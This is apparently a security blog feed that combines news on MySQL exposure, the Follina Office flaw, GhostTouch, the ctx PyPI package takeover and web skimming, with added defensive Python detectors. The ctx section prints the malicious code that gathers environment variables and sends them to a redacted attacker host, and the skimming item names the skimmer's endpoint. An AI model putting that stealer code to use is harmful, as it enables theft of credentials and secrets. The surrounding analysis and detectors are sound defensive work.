InfoSec and Compliance – With 20 years of blogging experience, DISC InfoSec blog is dedicated to providing trusted insights and practical solutions for professionals and organizations navigating the evolving cybersecurity landscape. From cutting-edge threats to compliance strategies, this blog is your reliable resource for staying informed and secure. Dive into the content, connect with the community, and elevate your InfoSec expertise!
Cybersecurity is required to be a dynamic industry because cybercriminals don’t take days off. Cybersecurity professionals must be innovative, creative, and attentive to keep gaining the upper hand on cybercriminals. Unfortunately, there are millions of unfilled cybersecurity job openings around the globe.
The gender divide
The problem of not enough cybersecurity professionals is exacerbated by a lack of diversity in the sector. There is a disproportionately low ratio of women to men within the entire technology industry. In the science, technology, engineering and math (STEM) industries, women make up only 24% of the workforce, and while this has increased from just 11% in 2017, there is clearly still a sizeable disparity.
The cybersecurity industry is performing only marginally better than STEM, with women making up roughly 24% of cybersecurity jobs globally, according to (ISC)².
There is also a parallel trend here: women in cybersecurity are more highly qualified than their male counterparts. Over half of women – 52% – have postgraduate degrees, compared to just 44% of men. More importantly, 28% of women have cybersecurity-related qualifications, while only 20% of men do. This raises an important point: women feel that they must be more qualified than men to compete for and hold the same cybersecurity roles. The industry is therefore losing a significant pool of talent because of this perception. Untapped talent means less innovation and dynamism in the products and services businesses offer.
Unfortunately, the challenges for women do not appear to stop once they enter the cybersecurity workforce. Pay disparity continues to blight the industry. Women reported being on smaller salaries at a higher proportion than men. 17% of women reported earning between $50,000 and $99,000 compared to 29% of men. However, there are signs that this disparity in pay is closing. For those in cybersecurity who earned over $100,000, the difference in percentage between men and women was much closer. This is encouraging and shows that once women are in the industry, they can enjoy as much success as men.
Nevertheless, reaching these higher levels of the cybersecurity industry is far from straightforward for women at present. It is an unavoidable fact that women still struggle to progress as easily as their male counterparts. A key reason for this is cultural: women are disinclined to shout about their achievements, so those achievements regularly go unnoticed when promotions and other opportunities come round.
The cybersecurity industry is starting to embrace diversity in the workforce, but there is a long way to go before women are as valued in cybersecurity as men. With the current skills deficit hampering the growth of cybersecurity providers, this is a perfect opportunity for the industry and individual providers to break the bias and turn to women to speed up innovation and improve defense against cybercriminals.
Welcome to our May 2022 review of data breaches and cyber attacks. We identified 77 security incidents during the month, resulting in 49,782,129 compromised records.
You can find the full list below, with incidents affecting UK organisations listed in bold.
“Wise is not the one who knows all the answers but the one who knows what questions to ask”
More than an article, this is a conversation starter for the CISO and his/her team: what are your answers to this list of essential questions that any information security department must deal with?
Obviously there are many other questions; these are just the foundation for a security program.
These questions are ordered: it will be hard to answer the later ones without having answers to the earlier ones.
For your organization:
Who are the clients of the information security team?
What are the drivers for security? This will include Business, Technical and Compliance aspects.
What are the business significant security objectives? Have these been agreed with the clients of the information security team?
How do you model your organization and the systems it relies on?
What are the third parties you exchange information with?
What is the list of assets that need to be protected? Who owns them? Who controls them?
What are the threats or risks?
What is the list of security controls or processes you have in place? What is the success criteria for each? How frequently do you check that they are not just effective but successful?
What is the list of non-compliances that need to be remediated?
What is your level of compliance?
What is the list of vulnerabilities that need to be remediated?
What is your level of security (or risk)?
How do you maintain your knowledge base?
What is your level of security maturity? This measures not your security but your ability to maintain and improve your security.
How do you report the activity of the information security team?
How do you report the value of security to your clients?
How do you prove to third parties your level of security?
What do you plan to do to improve the level of security (or decrease risk)?
How easy or difficult was it for you and your team to formulate an answer?
If you find these questions too easy, either you are a truly great CISO (please share your answers) or you suffer from a severe case of Dunning-Kruger. I will leave it to those readers to find out which.
Researchers uncovered 3.6M accessible MySQL servers worldwide that represent a potential attack surface for their owners.
Researchers from Shadowserver scanned the internet for publicly accessible MySQL server instances on port 3306/TCP and uncovered 3.6M installs worldwide responding to their queries.
These publicly accessible MySQL server instances represent a potential attack surface for their owners.
“These are instances that respond to our MySQL connection request with a Server Greeting. Surprisingly to us, we found around 2.3M IPv4 addresses responding with such a greeting to our queries. Even more surprisingly, we found over 1.3M IPv6 devices responding as well (though mostly associated with a single Autonomous System).” states the report published by the researchers.
Most of the accessible IPv4 MySQL servers are in the United States (740.1K), China (296.3K), Poland (207.8K) and Germany (174.9K).
Accessible IPv4 MySQL servers
Most of the accessible IPv6 MySQL servers are in the United States (460.8K), Netherlands (296.3K), Singapore (218.2K) and Germany (173.7K).
“It is unlikely that you need to have your MySQL server allowing for external connections from the Internet (and thus a possible external attack surface). If you do receive a report on your network/constituency take action to filter out traffic to your MySQL instance and make sure to implement authentication on the server.” concludes the report.
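The report counts a host as exposed when it answers a plain TCP connection with a MySQL Server Greeting. As an added example (not from the Shadowserver report), the parser below decodes that greeting so an owner can inventory their own hosts; the sample packets are constructed, not captured, and an ERR reply (host not allowed) still means the port is reachable from the outside.

```python
import socket
import struct
from typing import Optional

# CLIENT_PLUGIN_AUTH capability bit: when set, the greeting carries the auth plugin name.
CLIENT_PLUGIN_AUTH = 1 << 19
ER_HOST_NOT_PRIVILEGED = 1130  # "Host ... is not allowed to connect to this MySQL server"


def _frame(payload: bytes, seq: int = 0) -> bytes:
    """Wrap a payload in the 4-byte MySQL packet header (3-byte LE length, 1-byte sequence id)."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def build_sample_greeting() -> bytes:
    """Constructed Protocol::HandshakeV10 packet (sample data, not captured traffic)."""
    payload = (
        b"\x0a"                          # protocol version 10
        + b"8.0.29\x00"                  # server version, NUL-terminated
        + struct.pack("<I", 42)          # connection (thread) id
        + b"ABCDEFGH"                    # auth-plugin-data part 1 (8 bytes)
        + b"\x00"                        # filler
        + struct.pack("<H", 0xFFFF)      # capability flags, lower 16 bits
        + b"\xff"                        # character set
        + struct.pack("<H", 0x0002)      # status flags (SERVER_STATUS_AUTOCOMMIT)
        + struct.pack("<H", 0xDFFF)      # capability flags, upper 16 bits (bit 3 = PLUGIN_AUTH)
        + b"\x15"                        # total auth-plugin-data length (21)
        + b"\x00" * 10                   # reserved
        + b"IJKLMNOPQRST\x00"            # auth-plugin-data part 2 (13 bytes incl. NUL)
        + b"caching_sha2_password\x00"   # auth plugin name
    )
    return _frame(payload)


def build_sample_error() -> bytes:
    """Constructed ERR packet: the port is reachable but the server's host ACL refused us."""
    msg = b"Host 'scanner.example' is not allowed to connect to this MySQL server"
    return _frame(b"\xff" + struct.pack("<H", ER_HOST_NOT_PRIVILEGED) + msg)


def parse_server_greeting(packet: bytes) -> dict:
    """Decode the first packet a MySQL server sends after TCP connect."""
    if len(packet) < 5:
        raise ValueError("too short to be a MySQL packet")
    length = int.from_bytes(packet[0:3], "little")
    payload = packet[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated packet")
    if payload[0] == 0xFF:  # ERR packet instead of a greeting
        code = int.from_bytes(payload[1:3], "little")
        msg = payload[3:]
        if msg[:1] == b"#":  # optional '#' + 5-char SQL state marker
            msg = msg[6:]
        return {"kind": "error", "error_code": code, "message": msg.decode("utf-8", "replace")}
    if payload[0] != 0x0A:
        raise ValueError(f"unsupported handshake protocol version {payload[0]}")
    end = payload.index(b"\x00", 1)
    version = payload[1:end].decode("ascii", "replace")
    pos = end + 1
    conn_id = int.from_bytes(payload[pos:pos + 4], "little")
    pos += 4 + 8 + 1                     # connection id, salt part 1, filler
    cap_lo = int.from_bytes(payload[pos:pos + 2], "little")
    pos += 2 + 1 + 2                     # lower capabilities, charset, status flags
    cap_hi = int.from_bytes(payload[pos:pos + 2], "little")
    pos += 2
    capabilities = (cap_hi << 16) | cap_lo
    auth_len = payload[pos]
    pos += 1 + 10                        # auth data length, reserved
    plugin: Optional[str] = None
    if capabilities & CLIENT_PLUGIN_AUTH:
        pos += max(13, auth_len - 8)     # salt part 2
        plugin = payload[pos:payload.index(b"\x00", pos)].decode("ascii", "replace")
    return {"kind": "greeting", "server_version": version, "connection_id": conn_id,
            "capabilities": capabilities, "auth_plugin": plugin}


def probe(host: str, port: int = 3306, timeout: float = 3.0) -> Optional[dict]:
    """Connect to one of your own hosts and report whether it hands out a greeting (None if unreachable)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            data = sock.recv(4096)
    except OSError:
        return None
    return parse_server_greeting(data) if data else None
```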
Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly announced the formation of a joint ransomware task force, plans for which were originally outlined in the Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA).
Easterly announced the news at an Institute for Security and Technology (IST) event on May 20 in Washington, D.C., and also said the task force would have its first official meeting within the next few months.
“We’re very excited about it,” Easterly said during an event interview. “We think that this will actually build really nicely on the infrastructure and the scaffolding that we’ve developed with the [Joint Cyber Defense Collaborative] to use what we have as part of the federal cyber ecosystem and the companies that are part of the JCDC alliance to plug into the hub as envisioned in the Ransomware Task Force Report.”
She added that the FBI will co-chair the task force, which means the operational leads will be Eric Goldstein, CISA’s head of cyber and Bryan Vorndran, the assistant director of the FBI’s Cyber Division.
CIRCIA’s Reporting Requirements
Passed as part of the omnibus spending bill in March, CIRCIA focuses on critical infrastructure companies—ranging from financial services firms to energy companies, or other entities where a cybersecurity event would impact economic security or public health and safety.
CIRCIA would require these entities to report any substantial cybersecurity incidents or ransom payments to the federal government within 72 and 24 hours, respectively.
The Institute for Security and Technology issued a report last year that included a framework to combat the rising threat of ransomware.
Former State Department cybersecurity coordinator Chris Painter, also a co-chair of the ransomware task force working groups, explained during the IST event that combating ransomware threats requires a high degree of coordination and cooperation between government agencies.
“Establishing the new task force signals that this issue continues to be a priority and is a recognition that combating ransomware will take a sustained, long-term effort,” he said. “It should work to leverage federal and private sector capability to disrupt the major ransomware actors in any way possible.”
Easterly said the focus would be on operationalizing progress in an agile way and disrupting these bad actors, with CISA on the resilience/defense side.
“We want to work with all of our partners across the federal cyber ecosystem and the industry to actually be able to go after these actors in a very agile way at scale,” she said.
She said the days of holding threat report briefings on a quarterly basis are long over; it is no longer a realistic way of protecting critical infrastructure threats.
“We all have to be in the room all the time, sharing information constantly so that we can create that picture together, because it’s very likely that industry is going to see a cyberattack on the homeland before we see it,” Easterly said. “So, we have to be in the same room—we have to trust each other.”
Beyond Ransomware
The event also featured a keynote address from Deputy Attorney General Lisa Monaco, who announced twin initiatives from the Department of Justice.
The first is aimed at tackling illegal cryptocurrency transactions, while the second concerns the establishment of a cybersecurity operations international liaison position to speed up international operations aimed at disrupting the activities of cybersecurity threat actors globally.
“We’ve got to evolve to keep pace with the threat and the nation-states and criminal actors driving it,” Monaco said.
Matthew Warner, CTO and co-Founder at Blumira, a provider of automated threat detection and response technology, said as attacks against businesses and infrastructure have continued to grow, so has the impact of these attacks.
“Ransomware is a systemic risk to all computing at this point, which requires a unique response from governments,” he said. “To do this, however, requires a task force that can respond in a way that we have not seen before in cybersecurity.”
He explained if governments wanted to defend their and their allies’ infrastructures—commercial or not—then reducing ransomware across the globe is paramount.
Alex Ondrick, director of security operations at BreachQuest, an incident response specialist, noted that information-sharing and trust-building between government and private business is long overdue by at least a decade, but that initiatives such as JRTF could improve upon a growing private-public partnership.
“Governments have come to increasingly rely on the private sector, yet governments are only just beginning to reciprocate information-sharing,” he said. “Given new legislation and interest, CISA’s JRTF has an opportunity to increase the lines of communication and improve information-sharing.”
Ondrick added that an increasingly decentralized ransomware threat landscape has created an opportunity for more ransomware-as-a-service (RaaS) attackers and more ransomware attacks overall.
“Ransomware has become a key fixture of cybercrime as we move towards a post-COVID-19 world, and ransomware—as related to critical infrastructure—continues to evolve,” he said. “Preventing a ransomware attack against critical infrastructure is of the utmost seriousness and urgency.”
Regarding the DoJ’s initiative tackling illegal cryptocurrency transfers, Warner pointed out that the nature of blockchain—and therefore, cryptocurrencies—means every transaction is available for the world to see.
“While attackers will try to move this money around through tumblers, in the end, it must end up somewhere to convert to usable currency,” he said. “Government and NGO initiatives have the opportunity to track cryptocurrency use and look for clusters of ransomware payments being funneled through the blockchain.”
If the target wallets and/or transfers in and out of these potential ransomware wallets can be identified, then governments can disrupt the actors by seizing cryptocurrency from them—this was the case when the U.S. seized $30 million in cryptocurrency from the NetWalker ransomware group in early 2021.
“Ransomware will only continue to grow, as will new attacks leveraged by ransomware, which means that not only the government but also all private entities must level up quickly to defend properly,” Warner said.
(CVSS score 7.8), in the Microsoft Office productivity suite.
“On Monday May 30, 2022, Microsoft issued CVE-2022-30190 regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability.” reads the advisory published by Microsoft. “A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.”
This week, the cybersecurity researcher nao_sec discovered a malicious Word document (“05-2022-0438.doc”) that was uploaded to VirusTotal from Belarus. The document uses the remote template feature to fetch an HTML file and then uses the “ms-msdt” scheme to execute PowerShell code.
Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code. https://t.co/hTdAfHOUx3 pic.twitter.com/rVSb02ZTwt
The popular cybersecurity expert Kevin Beaumont, who named the bug Follina, published an analysis of the flaw.
“The document uses the Word remote template feature to retrieve a HTML file from a remote webserver, which in turn uses the ms-msdt MSProtocol URI scheme to load some code and execute some PowerShell.” reads the analysis published by Beaumont. “There’s a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled. Protected View does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View.”
The issue affects multiple Microsoft Office versions, including Office, Office 2016, and Office 2021.
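The two indicators described above, a document whose attached template is fetched from a remote URL and fetched content that hands off to the ms-msdt: scheme, can be checked statically without opening the file in Word. The triage helper below is an added example, not code from the analysis; the .docx it builds is a constructed minimal package, not the real maldoc, and the relationship type and .rels layout are those of the Office Open XML standard.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
# The MSProtocol URI scheme named in the analysis; matched case-insensitively.
MSDT_SCHEME = re.compile(r"ms-msdt:", re.IGNORECASE)


def find_external_relationships(docx_bytes: bytes) -> list:
    """Return (rels_part, type, target) for every relationship marked TargetMode="External".

    Relationships pointing outside the package are how a document pulls in
    remote content (such as a template) when it is opened or previewed.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found


def has_remote_template(docx_bytes: bytes) -> bool:
    """True when the document's attached template is loaded from an http(s) URL."""
    return any(
        rtype == ATTACHED_TEMPLATE and target.lower().startswith(("http://", "https://"))
        for _, rtype, target in find_external_relationships(docx_bytes)
    )


def references_msdt(fetched_html: str) -> bool:
    """True when the fetched remote content tries to invoke the MSDT URL handler."""
    return MSDT_SCHEME.search(fetched_html) is not None


def triage(docx_bytes: bytes, fetched_html: str = "") -> list:
    """Collect the indicators: remote template in the package, ms-msdt: hand-off in what it fetched."""
    reasons = []
    if has_remote_template(docx_bytes):
        reasons.append("attached template loaded from a remote URL")
    if fetched_html and references_msdt(fetched_html):
        reasons.append("fetched content invokes the ms-msdt: URI scheme")
    return reasons


def build_sample_docx(template_target: str, external: bool = True) -> bytes:
    """Constructed minimal .docx whose settings part references a template (sample, not the maldoc)."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" Target="{template_target}"{mode}/>'
        "</Relationships>"
    )
    wml = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{wml}"/>')
        zf.writestr("word/settings.xml", f'<w:settings xmlns:w="{wml}"/>')
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()
```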
Microsoft recommends disabling the MSDT URL protocol as a workaround; the instructions included in the guidance are below:
To disable the MSDT URL Protocol
Disabling the MSDT URL protocol prevents troubleshooters from being launched as links, including links throughout the operating system. Troubleshooters can still be accessed using the Get Help application and in system settings as other or additional troubleshooters. Follow these steps to disable it:
Run Command Prompt as Administrator.
To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename”.
Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.
How to undo the workaround
Run Command Prompt as Administrator.
To restore the registry key, execute the command “reg import filename”.
Microsoft credited crazyman of the Shadow Chaser Group with reporting the flaw; the tech giant labeled it as “fixed” on April 21, 2022, and dismissed the vulnerability as “not a security issue” because the diagnostic tool requires a passkey for its execution.
How to Identify and Reduce the Risks of 3rd Party Vendors
In a landscape filled with new threats and regulations, managing the risks of 3rd party vendors is vitally important. Most financial institutions have tens of thousands of supplier relationships, and many data breaches originate through IT vendors within the supply chain. Compounding this dilemma, regulators including OIG, OCC, FFIEC and others are increasing their focus on potential 3rd party risks. They want to see organizations proactively identifying potential risks, verifying that business partners, providers and their employees are compliant, monitoring for changes that might create new risks or compliance gaps, and managing the investigation and remediation of incidents.
During this webcast our panel will specifically address the practical ‘how to’s’ around identifying and reducing the risks of 3rd party vendors, and we will focus on:
Typical risks resulting from third party relationships
Common deficiencies of vendor management practices used during the on-boarding process, and the life of the relationship
Moving from a reactive to a proactive (preventative) vendor management process
Real world examples will be used to illustrate the key points and recommendations
Security researchers devised a technique, dubbed GhostTouch, to remotely control touchscreens using electromagnetic signals.
A team of researchers from Zhejiang University and Technical University of Darmstadt devised a technique, dubbed GhostTouch, to remotely control capacitive touchscreens using electromagnetic signals.
According to the experts, GhostTouch is the first active contactless attack against capacitive touchscreens.
GhostTouch uses electromagnetic interference (EMI) to remotely inject fake touch points into a capacitive device. The researchers demonstrated how to inject two types of basic touch events, taps and swipes, into targeted locations of the touchscreen. These events allowed the researchers to control the devices (e.g. answering an eavesdropping phone call, pressing a button, swiping up to unlock), and the attack technique was successful on nine smartphone models.
“We can inject targeted taps continuously with a standard deviation of as low as 14.6 x 19.2 pixels from the target area, a delay of less than 0.5s and a distance of up to 40mm. We show the real-world impact of the GhostTouch attacks in a few proof-of-concept scenarios, including answering an eavesdropping phone call, pressing the button, swiping up to unlock, and entering a password.” reads the research paper published by the academics. “Finally, we discuss potential hardware and software countermeasures to mitigate the attack.”
The GhostTouch system consists of two components, a touch injector and a phone locator. The touch injector is used to inject touch events into the touchscreen and includes a signal generator, an amplifier, an on/off switch, and a receiving antenna array. The phone locator is used to identify the position of the touchscreen and consists of a sensing antenna array, a data acquisition device, and a location calculator.
The experimental lab setup built by the researchers consists of an electrostatic gun that generates a strong pulse signal, which is fed to an antenna that transmits an electromagnetic field to the touchscreen.
The experts tested the technique against nine different smartphone models, including Galaxy A10s, Huawei P30 Lite, Honor View 10, Galaxy S20 FE 5G, Nexus 5X, Redmi Note 9S, Nokia 7.2, Redmi 8, and an iPhone SE (2020).
“We demonstrate the feasibility of this attack in the real world.” concludes the paper. “In places like a cafe, library, meeting room, or conference lobbies, people might place their smartphone face-down on the table. An attacker may embed the attack equipment under the table and launch attacks remotely. For example, an attacker may impersonate the victim to answer a phone call which would eavesdrop the private conversation, or visit a malicious website.”
The researchers provided a series of countermeasures to neutralize the attack, including adding electromagnetic shielding to block EMI, reinforcing the touchscreen, improving the detection algorithm of the touchscreen, and forcing some form of authentication for the execution of high-risk actions.
US Critical Infrastructure Security Agency (CISA) adds 41 new vulnerabilities to its Known Exploited Vulnerabilities Catalog.
The Cybersecurity & Infrastructure Security Agency (CISA) has added 41 flaws to its Known Exploited Vulnerabilities Catalog, including recently addressed issues in the Android kernel (CVE-2021-1048 and
The Cisco IOS XR flaw (CVE-2022-20821, CVSS score 6.5) is actively exploited in attacks in the wild; it resides in the health check RPM of Cisco IOS XR Software. An unauthenticated, remote attacker could trigger the issue to access the Redis instance that is running within the NOSi container.
A keen-eyed researcher at SANS recently wrote about a new and rather specific sort of supply chain attack against open-source software modules in Python and PHP.
Following on-line discussions about a suspicious public Python module, Yee Ching Tok noted that a package called ctx in the popular PyPi repository had suddenly received an “update”, despite not otherwise being touched since late 2014.
In theory, of course, there’s nothing wrong with old packages suddenly coming back to life.
Sometimes, developers return to old projects when a lull in their regular schedule (or a guilt-provoking email from a long-standing user) finally gives them the impetus to apply some long-overdue bug fixes.
In other cases, new maintainers step up in good faith to revive “abandonware” projects.
But packages can become victims of secretive takeovers, where the password to the relevant account is hacked, stolen, reset or otherwise compromised, so that the package becomes a beachhead for a new wave of supply chain attacks.
Simply put, some package “revivals” are conducted entirely in bad faith, to give cybercriminals a vehicle for pushing out malware under the guise of “security updates” or “feature improvements”.
The attackers aren’t necessarily targeting any specific users of the package they compromise – often, they’re simply watching and waiting to see if anyone falls for their package bait-and-switch…
…at which point they have a way to target the users or companies that do.
New code, old version number
In this attack, Yee Ching Tok noticed that although the package suddenly got updated, its version number didn’t change, presumably in the hope that some people might [a] take the new version anyway, perhaps even automatically, but [b] not bother to look for differences in the code.
But a diff (short for difference, where only new, changed or deleted lines in the code are examined) showed added lines of Python code like this:
You may remember, from the infamous Log4Shell bug, that so-called environment variables, accessible via os.environ in Python, are memory-only key=value settings associated with a specific running program.
Data that’s presented to a program via a memory block doesn’t need to be written to disk, so this is a handy way of passing across secret data such as encryption keys while guarding against saving the data improperly by mistake.
However, if you can poison a running program, which will already have access to the memory-only process environment, you can read out the secrets for yourself and steal them, for example by sending them out buried in regular-looking network traffic.
If you leave the bulk of the source code you’re poisoning untouched, its usual functions will still work as before, and so the malevolent tweaks in the package are likely to go unnoticed.
Why now?
Apparently, the reason this package was attacked only recently is that the server name used for email by the original maintainer had just expired.
The attackers were therefore able to buy up the now-unused domain name, set up an email server of their own, and reset the password on the account.
Interestingly, the poisoned ctx package was soon updated twice more, with more added “secret sauce” squirrelled away in the infected code, this time including more aggressive data-stealing code.
The requests.get() line below connects to an external server controlled by the crooks, though we have redacted the domain name here:
    def sendRequest(self):
        str = ""
        for _, v in environ.items():
            str += v + " "
        ### --encode string into base64
        resp = requests.get("https://[REDACTED]/hacked/" + str)
The redacted exfiltration server will receive the encoded environment variables (including any stolen data such as access keys) as an innocent-looking string of random-looking data at the end of the URL.
The response that comes back doesn’t actually matter, because it’s the outgoing request, complete with appended secret data, that the attackers are after.
If you want to try this for yourself, you can create a standalone Python program based on the pseudocode above, such as this:
Then start a listening HTTP pseudoserver in a separate window (we used the excellent ncat utility from the Nmap toolkit, as seen below), and run the Python code.
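The tell-tale shape of the poisoned ctx code is a single function that walks environ and hands the result to an outbound request. As an added example (not from the SANS write-up or the ctx package), the AST scanner below flags that pairing in package source before installation; the sample source embeds the snippet quoted above, with its exfiltration domain still redacted, beside two benign functions, and the callee lists are an assumed starting point.

```python
import ast

# Outbound-network callees worth correlating with environment reads (assumed list; extend as needed).
NETWORK_CALLEES = {"requests.get", "requests.post", "requests.request",
                   "urllib.request.urlopen", "urlopen"}
ENV_CALLEES = {"os.getenv", "getenv"}

# Constructed sample: the quoted ctx routine (domain redacted, as above) plus two legitimate functions.
SUSPECT_SOURCE = '''
from os import environ
import requests

class Ctx:
    def sendRequest(self):
        data = ""
        for _, v in environ.items():
            data += v + " "
        resp = requests.get("https://[REDACTED]/hacked/" + data)

def load_config():
    # legitimate: reads one variable and never sends it anywhere
    return environ.get("CTX_DEBUG", "0") == "1"

def fetch_changelog():
    # legitimate: network call that never touches the environment
    return requests.get("https://example.invalid/CHANGELOG").text
'''


def _dotted_name(node: ast.AST) -> str:
    """Render a Name/Attribute chain such as requests.get as 'requests.get' ('' if not a plain chain)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


class EnvExfilFinder(ast.NodeVisitor):
    """Flags functions that both read the process environment and make an outbound network call."""

    def __init__(self) -> None:
        self.findings = []

    def visit_FunctionDef(self, node: ast.FunctionDef) -> None:
        reads_env = False
        net_calls = []
        for sub in ast.walk(node):
            if isinstance(sub, ast.Name) and sub.id == "environ":
                reads_env = True            # from os import environ; environ.items()
            elif isinstance(sub, ast.Attribute) and sub.attr == "environ":
                reads_env = True            # os.environ[...]
            elif isinstance(sub, ast.Call):
                callee = _dotted_name(sub.func)
                if callee in ENV_CALLEES:
                    reads_env = True
                elif callee in NETWORK_CALLEES:
                    net_calls.append(callee)
        if reads_env and net_calls:
            self.findings.append({"function": node.name, "line": node.lineno,
                                  "calls": sorted(set(net_calls))})
        self.generic_visit(node)            # nested functions get their own verdict

    visit_AsyncFunctionDef = visit_FunctionDef


def find_env_exfil(source: str) -> list:
    """Parse Python source and return one finding per function that pairs environ reads with network calls."""
    finder = EnvExfilFinder()
    finder.visit(ast.parse(source))
    return finder.findings
```

Running it over an unpacked sdist or wheel before installation, and diffing the result against the previous release, catches the case this article describes: new code under an unchanged version number.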
Threat actors behind web skimming campaigns are using malicious JavaScript to mimic Google Analytics and Meta Pixel scripts to avoid detection.
Microsoft security researchers recently observed web skimming campaigns that used multiple obfuscation techniques to avoid detection.
The threat actors obfuscated the skimming script by encoding it in PHP, which, in turn, was embedded in an image file; with this trick, the code is executed when a website’s index page is loaded.
The experts also observed compromised web applications injected with malicious JavaScript masquerading as Google Analytics and Meta Pixel (formerly Facebook Pixel) scripts. Some skimming scripts also included anti-debugging mechanisms.
The term web skimming refers to the criminal practice of harvesting the payment information of a website’s visitors during checkout. Crooks typically exploit vulnerabilities in e-commerce platforms and CMSs to inject the skimming script into the pages of the e-store. In some cases, attackers exploit vulnerabilities in installed third-party plugins and themes to inject malicious scripts.
“During our research, we came across two instances of malicious image files being uploaded to a Magento-hosted server. Both images contained a PHP script with a Base64-encoded JavaScript, and while they had identical JavaScript code, they slightly differed in their PHP implementation.” reads the analysis published by Microsoft. “The first image, disguised as a favicon (also known as a shortcut or URL icon), was available on VirusTotal, while the other one was a typical web image file discovered by our team.”
Microsoft also observed attackers masquerading as Google Analytics and Meta Pixel (formerly Facebook Pixel) scripts to avoid raising suspicion.
The attackers place a Base64-encoded string inside a spoofed Google Tag Manager code. This string decodes to trafficapps.business/data.php?p=form.
Encoded skimming script in a spoofed Google Analytics code (Source Microsoft)
Experts noticed that the attackers behind the Meta Pixel spoofing used newly registered domains (NRDs) using HTTPS.
“Given the increasingly evasive tactics employed in skimming campaigns, organizations should ensure that their e-commerce platforms, CMSs, and installed plugins are up to date with the latest security patches and that they only download and use third-party plugins and services from trusted sources,” Microsoft concludes.
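A genuine Google Analytics or Tag Manager loader has no reason to hide its script URL in Base64, so the encoded string is itself the signal. The checker below is an added example (not Microsoft's detection logic): it decodes Base64 runs found in a page's inline scripts, pulls out any hostnames, and reports those not on an allowlist; the spoofed snippet and the skimmer.example host are constructed, and the allowlist is an assumption to tailor per site.

```python
import base64
import re
from urllib.parse import urlparse

# Runs long enough to hide a URL; shorter runs are mostly identifiers and hashes.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Absolute URLs, or scheme-less host/path strings like the one the article decodes.
URL_RE = re.compile(r"https?://[^\s\"'<>]+|(?:[a-z0-9-]+\.)+[a-z]{2,}/[^\s\"'<>]*", re.IGNORECASE)
# Hosts a legitimate analytics loader is expected to contact (assumed allowlist).
TRUSTED_HOSTS = {"www.google-analytics.com", "www.googletagmanager.com", "connect.facebook.net"}

# Constructed spoofed Google Tag Manager loader: the real gtm.js URL is replaced by atob(<base64>).
_HIDDEN = base64.b64encode(b"https://skimmer.example/data.php?p=form").decode()
SPOOFED_GTM = f"""
<script>(function(w,d,s,l,i){{w[l]=w[l]||[];w[l].push({{'gtm.start':new Date().getTime(),event:'gtm.js'}});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src=atob('{_HIDDEN}');f.parentNode.insertBefore(j,f);
}})(window,document,'script','dataLayer','GTM-XXXX');</script>
"""
LEGIT_GTM = """
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXX');</script>
"""


def decode_candidates(script: str) -> list:
    """Return the printable UTF-8 text of every Base64-looking run that decodes cleanly."""
    decoded = []
    for match in B64_RE.finditer(script):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def hidden_hosts(script: str) -> set:
    """Hostnames referenced only inside Base64-encoded strings in the script."""
    hosts = set()
    for text in decode_candidates(script):
        for url in URL_RE.findall(text):
            host = urlparse(url if "://" in url else "//" + url).hostname
            if host:
                hosts.add(host.lower())
    return hosts


def suspicious_hosts(script: str, trusted: set = TRUSTED_HOSTS) -> set:
    """Hidden hosts that a legitimate analytics tag would not contact."""
    return {h for h in hidden_hosts(script) if h not in trusted}
```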
Many security engineers are already one foot out the door. Why?
The position of security engineer has become a pivotal role for modern security teams. Practitioners are responsible for critical monitoring of networks and systems to identify threats or intrusions that could cause immense harm to an organization.
They must analyze troves of security-related data and detect immediate threats as early as possible on the cyber kill chain. From their vantage point, they are often best positioned to evaluate security monitoring solutions and recommend security operations improvements to management.
